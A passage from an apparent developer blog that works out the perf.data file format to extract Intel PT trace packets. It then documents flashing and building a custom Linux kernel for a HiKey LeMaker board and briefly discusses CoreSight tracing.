   u64 attr_size;
   struct perf_file_section attrs;
   struct perf_file_section data;
   /* event_types is ignored */
   struct perf_file_section event_types;
   DECLARE_BITMAP(adds_features, HEADER_FEAT_BITS);
};

So we start by mmaping the whole file to buf and just typecasting it to this. The header->data element is an interesting thing. It contains an offset and size as part of perf_file_section struct. We observe, that the offset is near the start of some strings – probably some event information? Hmm.. so lets try to typecast this offset position in the mmap buffer (pos + buf) to perf_event_header struct :

struct perf_event_header {
   __u32 type;
   __u16 misc;
   __u16 size;
};

For starters, lets further print this h->type and see what the first event is. With our perf.data file, the perf report -D command as a reference tells us that it may be the event type 70 (0x46) with 136 (0x88) bytes of data in it. Well, the hex says its the same thing at (buf + pos) offset. This in interesting! Probably we just found our event. Lets just iterate over the whole buffer while adding the h->size. We will print the event types as well.

while (pos < file.size()) {
    struct perf_event_header *h = (struct perf_event_header *) (buf + pos);
    qDebug() << "Event Type" << h->type;
    qDebug() << "Event Size" << h->size;
    pos += h->size;
}

Nice! We have so many events. Who knew? Perhaps the data file is not a mystery anymore. What are these event types though? The perf_event.h file has a big enum with event types and some very useful documentation. Some more mucking around leads us to the following enum :

enum perf_user_event_type { /* above any possible kernel type */
    PERF_RECORD_USER_TYPE_START = 64,
    PERF_RECORD_HEADER_ATTR = 64, 
    PERF_RECORD_HEADER_EVENT_TYPE = 65, /* depreceated */
    PERF_RECORD_HEADER_TRACING_DATA = 66,
    PERF_RECORD_HEADER_BUILD_ID = 67,
    PERF_RECORD_FINISHED_ROUND = 68,
    PERF_RECORD_ID_INDEX = 69,
    PERF_RECORD_AUXTRACE_INFO = 70,
    PERF_RECORD_AUXTRACE = 71,
    PERF_RECORD_AUXTRACE_ERROR = 72,
    PERF_RECORD_HEADER_MAX
};

So event 70 was PERF_RECORD_AUXTRACE_INFO. Well, the Intel PT folks indicate in the documentation that they store the hardware trace data in an AUX buffer. And perf report -D also shows event 71 with some decoded PT data. Perhaps, that is what we want. A little more fun with GDB on perf tells us that while iterating perf itself uses the union perf_event from event.h which contains an auxtrace_event struct as well.

struct auxtrace_event {
    struct perf_event_header header;
    u64 size;
    u64 offset;
    u64 reference;
    u32 idx;
    u32 tid;
    u32 cpu;
    u32 reserved__; /* For alignment */
};

So, this is how they lay out the events in the file. Interesting. Well, it seems we can just look for event type 71 and then typecast it to this struct. Then extract the size amount of bytes from this and move on. Intel PT documentation further says that the aux buffer was per-CPU so we may need to extract separate files for each CPU based on the cpu field in the struct. We do just that and get our extracted bytes as raw PT packets which the CPUs generated when the intel_pt event was used with Perf.

A Working Example

The above exercise was surprisingly easy once we figured out stuff so we just did a small prototype for our lab’s research purposes.  There are lot of things we learnt. For example, the actual bytes for the header (containing event stats etc. – usually the thing that Perf prints on top if you do perf report --header) are actually written at the end of the Perf’s data file. How endianness of file is determined by magic. Just before the header in the end, there are some bytes which I still have not figured out (near event 68) how they can be handled. Perhaps it is too easy, and I just don’t know the big picture yet. We just assume there are no more events if the event size is 0 😉 Works for now. A more convenient way that this charade is to use scripts such as this for doing custom analyses. But I guess it is less fun that going all l33t on the data file.

I’ll try to get some more events out along with the Intel PT data and see what all stuff is hidden inside. Also, Perf is quite tightly bound to the kernel for various reasons. Custom userspace APIs may not always be the safest solution. There is no guarantee that analyzing binary from newer versions of Perf would always work with the approach of our experimental tool. I’ll keep you folks posted as I discover more about Perf internals.

Custom Kernel on 96boards Hikey LeMaker

I started exploring CoreSight on the newer Cortex A-53 based platforms and the one which caught my eye was a Hisilicon Kirin 620 octa-core CPU based Hikey LeMaker. It seems really powerful for the size it comes in. However, the trials with Coresight did not end well for me as I soon realized that there is some issue in hardware that is preventing Coresight access on all CPUs with upstream kernel drivers. I further looked at the device tree files in their kernel tree and it seems the descriptions for CoreSight components is still not there. Probably it will be fixed somehow with more kernel patches hopefully. I did not experiment with it further. Apart from that, the board seems a really nice thing to play around with. There is Android as well as Debain support that works out of the box. I am just documenting steps I used to get a custom kernel for the board so that I don’t forget them 😉 Probably someone else may also find them useful. For a complete guide go here. Lets start with getting the necessary files and the latest filesystem. I am using the 17th March snapshot from here. It is based on the hikey-mainline-rebase branch of their custom Linux kernel repo. Hopefully in the near future none of this will be required and things get into mainline. We also need the flashing tools and bootloader from here.

Updating with pre-built Images

The board ships with a v3.10 kernel. We need to first update it with the prebuilt binaries and then add our own custom built kernel to a custom location in rootfs. First get fastboot on your host with

$ sudo dnf install fastboot

Then copy the following lines in /etc/udev/rules.d/51-android.rules on the host so we can set proper read/write permissoins and access it withour root.

SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", ATTR{idProduct}=="d00d", MODE="0660", GROUP="dialout"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", ATTR{idProduct}=="1057", MODE="0660", GROUP="dialout"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", ATTR{idProduct}=="1050", MODE="0660", GROUP="dialout"

Now close Jumper 1 and Jumper 2 in CONFIG section (J601) on the board. It is near the Extended IO. Power on the board. If you have a serial connection to your host, nothing should come up. Now send the boot downloader to the board. A green LED lights up. Also, after that check if the device is now recognized by fastboot.

$ sudo python hisi-idt.py -d /dev/ttyUSB0 --img1=l-loader.bin
$ sudo fastboot devices

The board should now be listed by fastboot as a device. We now start writing all binaries to the EMMC – partition table, kernel image, rootfs etc to get the system alive again. The 8G table is for the board with 8G NAND.

$ sudo fastboot flash ptable ptable-linux-8g.img
$ sudo fastboot flash fastboot fip.bin
$ sudo fastboot flash nvme nvme.img
$ sudo fastboot flash boot boot-fat.uefi.img
$ sudo fastboot flash system hikey-jessie_developer_20160317-33.emmc.img

We are done. Open Jumper 2 and restart. You should now see the snapshot kernel being booted up.

Build Custom Kernel

This is a quick way to build and test kernels based on the source from here. More and detailed information on building software from source is here. You will also need a cross toolchain to build the kernel. Get the Linaro one and set it up.

$ export LOCALVERSION="-suchakra-hikey"
$ make distclean
$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig

You can customize what you want in the kernel now and then build the Image, modules and the device tree blob,

$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- menuconfig 
$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j8 Image modules hisilicon/hi6220-hikey.dtb

Install the modules in a local directory for now

$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=./modules-4.4-suchakra modules_install

Transfer Kernel to Board

Next, copy /arch/arm64/boot/Image and /arch/arm64/boot/dts/hisilicon/hi6220-hikey.dtb  from the host to the board in /boot/suchakra directory. You can just scp these from the host. Add another menu entry in  /boot/efi/…/grub.cfg with the new kernel and dtb file. You can keep the initrd same. Copy the /lib/modules inside modules-4.4-suchakra from host to the target.

That is all. Time to reboot! I sometimes need to build custom kernel often so I have setup a script to build and scp the image from host to the target.

What about CoreSight?

As I said before, this may not be the best platform to experiment CoreSight however it maybe possible to access trace features using the Coresight Access Library from ARM DS-5. I also tried the Snapdragon based Dragonboard 410c and I was able to build and run the 4.4 kernel with CoreSight support quite quickly on that one as well. Linaro developers hint at CoreSight support for A-53 (v8) reaching mainline kernel in v4.7. The v4.4 one that I have right now is from the landing-team git of Linaro. I can confirm that on Dragonboard 410c, it is possible to get traces using ETF as sink and ETM as source by using the default kernel drivers and following  the default kernel documentation on the same. The generated trace binary can be read using ptm2human which supports ETMv4 now. However, I am still trying to get my head around what the decoded traces actually mean. More coresight stuff will follow as I discover its power. Apart from that, it was fun learning how DTBs work 🙂